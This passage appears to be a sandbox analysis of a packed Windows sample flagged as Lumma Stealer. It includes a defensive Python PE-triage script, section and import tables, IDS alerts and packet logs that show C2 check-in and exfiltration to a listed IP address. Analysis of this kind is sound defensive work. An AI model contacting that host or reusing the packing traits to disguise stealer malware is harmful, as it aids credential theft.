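        name, vsize, va, raw_size, raw_ptr, *_ = struct.unpack_from(SECTION_FMT, image, table_off + 40 * i)
        raw = image[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\x00").decode("latin-1"), "va": va,
                         "span": max(vsize, raw_size), "entropy": round(shannon_entropy(raw), 3)})
    return {"image_base": image_base, "entry_rva": entry_rva,
            "entry_va": image_base + entry_rva, "timestamp": timestamp, "sections": sections}


def entry_section(info: dict):
    """Name of the section whose virtual range contains the entrypoint RVA, or None."""
    for s in info["sections"]:
        if s["va"] <= info["entry_rva"] < s["va"] + s["span"]:
            return s["name"]
    return None


def timestamp_utc(ts: int) -> str:
    """COFF TimeDateStamp is seconds since the Unix epoch; render it as the report does."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def triage_flags(info: dict) -> list:
    """Header-only packer/protector indicators; none of them alone proves anything."""
    flags = []
    ep = entry_section(info)
    if ep is None:
        flags.append("entrypoint outside every section")
    elif ep != info["sections"][0]["name"]:
        flags.append(f"entrypoint in non-first section {ep!r}")
    for s in info["sections"]:
        if any(not (ch.isalnum() or ch in "._$") for ch in s["name"]):
            flags.append(f"section name with special chars {s['name']!r}")
        if s["entropy"] >= 7.0:
            flags.append(f"high-entropy section {s['name']!r} ({s['entropy']})")
    return flags


def build_demo_pe() -> bytes:
    """Constructed PE32 image (not the sample): header values from the report, section bodies invented."""
    image_base, entry_va, timestamp = 0x400000, 0x6FE000, 0x67695986
    text_raw = bytes([0x55, 0x8B, 0xEC, 0xC3]) * 64    # 4 equiprobable byte values: entropy 2.0
    taggant_raw = bytes(range(256)) * 2                # 256 equiprobable byte values: entropy 8.0
    layout = [(".text", 0x1000, 0x200, text_raw), (".taggant", 0x2FE000, 0x400, taggant_raw)]
    e_lfanew, opt_size = 0x80, 224
    dos = (b"MZ" + b"\x00" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\x00")
    coff = struct.pack(COFF_FMT, 0x14C, len(layout), timestamp, 0, 0, opt_size, 0x0102)
    # PE32 optional header: Magic, linker versions, three size fields, AddressOfEntryPoint,
    # BaseOfCode, BaseOfData, ImageBase; the remaining fields are left zero
    opt = struct.pack("<HBBIIIIIII", 0x10B, 0, 0, 0, 0, 0, entry_va - image_base, 0, 0, image_base)
    opt = opt.ljust(opt_size, b"\x00")
    table = b"".join(struct.pack(SECTION_FMT, name.encode(), len(raw), va, len(raw), ptr,
                                 0, 0, 0, 0, 0x60000020) for name, va, ptr, raw in layout)
    image = bytearray((dos + b"PE\x00\x00" + coff + opt + table).ljust(0x600, b"\x00"))
    for _, _, ptr, raw in layout:
        image[ptr:ptr + len(raw)] = raw
    return bytes(image)


if __name__ == "__main__":
    info = parse_pe(build_demo_pe())
    print(f"Entrypoint: 0x{info['entry_va']:x} (RVA 0x{info['entry_rva']:x}) in {entry_section(info)}")
    print(f"Time Stamp: 0x{info['timestamp']:x} [{timestamp_utc(info['timestamp'])} UTC]")
    for s in info["sections"]:
        print(f"  {s['name']:<9} VA=0x{s['va']:06x} entropy={s['entropy']}")
    for flag in triage_flags(info):
        print("  !", flag)
```

The report's Entrypoint field is a virtual address (ImageBase + AddressOfEntryPoint), so 0x6fe000 corresponds to RVA 0x2fe000; mapping that RVA into the section table is what turns a bare number into the ".taggant" verdict. The report's Entropy figure is computed over the whole file, whereas the per-section figure is what separates a packed payload section from a small loader stub, which is why the example computes it per section.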
                                                                                                            Instruction
                                                                                                            jmp 00007FA94480340Ah
                                                                                                            pslld mm5, qword ptr [eax+eax]
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            jmp 00007FA944805405h
                                                                                                            add byte ptr [edx+ecx], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            xor byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax+eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [edx+ecx], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            or dword ptr [eax+00000000h], eax
                                                                                                            add byte ptr [eax], al
                                                                                                            adc byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add al, 0Ah
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
                                                                                                            add byte ptr [eax], al
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x54059         | 0x6d         | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x541f8         | 0x8          | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name     | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type            | Entropy            | Characteristics
         | 0x1000          | 0x52000      | 0x26400  | 2c98ae654f64e6c643cf40f0aa8156e2 | False    | 0.9995212928921569  | data                 | 7.975723556996926  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc    | 0x53000         | 0x1000       | 0x0      | d41d8cd98f00b204e9800998ecf8427e | False    | 0                   | empty                | 0.0                | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata   | 0x54000         | 0x1000       | 0x200    | 39a711a7d804ccbc2a14eea65cf3c27e | False    | 0.154296875         | data                 | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nszjqukc | 0x55000         | 0x2a8000     | 0x2a7600 | 86cafc17af655f3070c7ab4ecd284ee7 | unknown  | unknown             | unknown              | unknown            | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
kpouiknl | 0x2fd000        | 0x1000       | 0x600    | fae3ea3e069c41399284db7ed88fa45a | False    | 0.5924479166666666  | data                 | 5.185452761620342  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x2fe000        | 0x3000       | 0x2200   | c2f9468feae118e26b430f72b9a5e4eb | False    | 0.06353400735294118 | DOS executable (COM) | 0.7032087179830366 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL          | Import
kernel32.dll | lstrcpy


Timestamp                       | SID     | Signature                                                  | Severity | Source IP   | Source Port | Dest IP        | Dest Port | Protocol
2024-12-26T12:49:12.560680+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3        | 192.168.2.8 | 49704       | 172.67.165.185 | 443       | TCP
2024-12-26T12:49:24.546737+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity                 | 1        | 192.168.2.8 | 49704       | 172.67.165.185 | 443       | TCP
2024-12-26T12:49:24.546737+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin                 | 1        | 192.168.2.8 | 49704       | 172.67.165.185 | 443       | TCP
2024-12-26T12:49:25.875475+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3        | 192.168.2.8 | 49705       | 172.67.165.185 | 443       | TCP
2024-12-26T12:49:26.668292+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2              | 1        | 192.168.2.8 | 49705       | 172.67.165.185 | 443       | TCP
2024-12-26T12:49:26.668292+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin                 | 1        | 192.168.2.8 | 49705       | 172.67.165.185 | 443       | TCP
2024-12-26T12:49:28.543470+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3        | 192.168.2.8 | 49707       | 172.67.165.185 | 443       | TCP
2024-12-26T12:49:48.959861+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration     | 1        | 192.168.2.8 | 49707       | 172.67.165.185 | 443       | TCP
2024-12-26T12:49:50.522564+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3        | 192.168.2.8 | 49711       | 172.67.165.185 | 443       | TCP
2024-12-26T12:50:12.820235+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3        | 192.168.2.8 | 49713       | 172.67.165.185 | 443       | TCP
2024-12-26T12:50:15.777767+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3        | 192.168.2.8 | 49714       | 172.67.165.185 | 443       | TCP
2024-12-26T12:50:52.235124+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration     | 1        | 192.168.2.8 | 49714       | 172.67.165.185 | 443       | TCP
2024-12-26T12:50:54.725222+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3        | 192.168.2.8 | 49776       | 172.67.165.185 | 443       | TCP
2024-12-26T12:50:56.377606+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3        | 192.168.2.8 | 49782       | 172.67.165.185 | 443       | TCP
                                                                                                            • Total Packets: 84
                                                                                                            • 443 (HTTPS)
                                                                                                            • 53 (DNS)
Timestamp                         | Source Port | Dest Port | Source IP      | Dest IP
Dec 26, 2024 12:49:11.246949911 CET | 49704 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:11.246995926 CET | 443   | 49704 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:11.247101068 CET | 49704 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:11.250770092 CET | 49704 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:11.250783920 CET | 443   | 49704 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:12.560560942 CET | 443   | 49704 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:12.560679913 CET | 49704 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:12.564630032 CET | 49704 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:12.564637899 CET | 443   | 49704 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:12.564965010 CET | 443   | 49704 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:12.610487938 CET | 49704 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:12.613548040 CET | 49704 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:12.613567114 CET | 49704 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:12.613686085 CET | 443   | 49704 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:24.546734095 CET | 443   | 49704 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:24.546823978 CET | 443   | 49704 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:24.546894073 CET | 49704 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:24.549709082 CET | 49704 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:24.549734116 CET | 443   | 49704 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:24.567912102 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:24.567945957 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:24.568056107 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:24.569281101 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:24.569292068 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:25.875380993 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:25.875474930 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:25.876950979 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:25.876960039 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:25.877454996 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:25.885807037 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:25.885829926 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:25.885905981 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.668292999 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.668340921 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.668374062 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.668401003 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.668427944 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:26.668441057 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.668454885 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:26.676147938 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.676244020 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.676309109 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:26.676322937 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.676398039 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:26.684585094 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.735495090 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:26.735516071 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.782413960 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:26.788016081 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.829298019 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:26.878473997 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.882165909 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.882234097 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:26.882242918 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.882256985 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.882348061 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.882369995 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:26.882441044 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:26.882694006 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:26.882694006 CET | 49705 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:26.882719994 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:26.882730007 CET | 443   | 49705 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:27.121974945 CET | 49707 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:27.122011900 CET | 443   | 49707 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:27.122117043 CET | 49707 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:27.122425079 CET | 49707 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:27.122435093 CET | 443   | 49707 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:28.543230057 CET | 443   | 49707 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:28.543469906 CET | 49707 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:28.545145988 CET | 49707 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:28.545167923 CET | 443   | 49707 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:28.545444012 CET | 443   | 49707 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:28.546931028 CET | 49707 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:28.547036886 CET | 49707 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:28.547075033 CET | 443   | 49707 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:48.959566116 CET | 443   | 49707 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:48.959651947 CET | 443   | 49707 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:48.959702969 CET | 49707 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:48.959949017 CET | 49707 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:48.959971905 CET | 443   | 49707 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:49.079025030 CET | 49711 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:49.079080105 CET | 443   | 49711 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:49.079154015 CET | 49711 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:49.079524040 CET | 49711 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:49.079535007 CET | 443   | 49711 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:50.522396088 CET | 443   | 49711 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:50.522563934 CET | 49711 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:50.526665926 CET | 49711 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:50.526678085 CET | 443   | 49711 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:50.526943922 CET | 443   | 49711 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:50.536403894 CET | 49711 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:50.536557913 CET | 49711 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:50.536587954 CET | 443   | 49711 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:49:50.536670923 CET | 49711 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:49:50.579341888 CET | 443   | 49711 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:50:11.064418077 CET | 49711 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:50:11.511199951 CET | 49713 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:50:11.511244059 CET | 443   | 49713 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:50:11.511353970 CET | 49713 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:50:11.511816025 CET | 49713 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:50:11.511831045 CET | 443   | 49713 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:50:12.820116043 CET | 443   | 49713 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:50:12.820235014 CET | 49713 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:50:12.822173119 CET | 49713 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:50:12.822181940 CET | 443   | 49713 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:50:12.822987080 CET | 443   | 49713 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:50:12.824361086 CET | 49713 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:50:12.824466944 CET | 49713 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:50:12.824526072 CET | 443   | 49713 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:50:12.824626923 CET | 49713 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:50:12.824635029 CET | 443   | 49713 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:50:13.902182102 CET | 443   | 49713 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:50:13.902280092 CET | 443   | 49713 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:50:13.902575970 CET | 49713 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:50:13.902808905 CET | 49713 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:50:13.902831078 CET | 443   | 49713 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:50:14.454490900 CET | 49714 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:50:14.454538107 CET | 443   | 49714 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:50:14.454824924 CET | 49714 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:50:14.455248117 CET | 49714 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:50:14.455264091 CET | 443   | 49714 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:50:15.777462006 CET | 443   | 49714 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:50:15.777766943 CET | 49714 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:50:15.783065081 CET | 49714 | 443   | 192.168.2.8    | 172.67.165.185
Dec 26, 2024 12:50:15.783081055 CET | 443   | 49714 | 172.67.165.185 | 192.168.2.8
Dec 26, 2024 12:50:15.783560038 CET | 443   | 49714 | 172.67.165.185 | 192.168.2.8
                                                                                                            Dec 26, 2024 12:50:15.819108009 CET49714443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:15.819251060 CET49714443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:15.819257021 CET44349714172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:52.235126972 CET44349714172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:52.235240936 CET44349714172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:52.235331059 CET49714443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:52.240700006 CET49714443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:52.240717888 CET44349714172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:53.419692039 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:53.419744015 CET44349776172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:53.419836998 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:53.420423031 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:53.420439959 CET44349776172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:54.725060940 CET44349776172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:54.725222111 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:54.726649046 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:54.726670027 CET44349776172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:54.726928949 CET44349776172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:54.844894886 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:54.894037962 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:54.894156933 CET44349776172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:54.894377947 CET44349776172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:54.894392967 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:54.894429922 CET49776443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:55.070844889 CET49782443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:55.070909977 CET44349782172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:55.071104050 CET49782443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:55.072540998 CET49782443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:55.072561026 CET44349782172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:56.377393007 CET44349782172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:56.377605915 CET49782443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:56.379018068 CET49782443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:56.379038095 CET44349782172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:56.379369974 CET44349782172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:56.384265900 CET49782443192.168.2.8172.67.165.185
                                                                                                            Dec 26, 2024 12:50:56.384325981 CET44349782172.67.165.185192.168.2.8
                                                                                                            Dec 26, 2024 12:50:56.384394884 CET49782443192.168.2.8172.67.165.185
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Dec 26, 2024 12:49:11.101495028 CET  55425  53  192.168.2.8  1.1.1.1
Dec 26, 2024 12:49:11.240886927 CET  53  55425  1.1.1.1  192.168.2.8
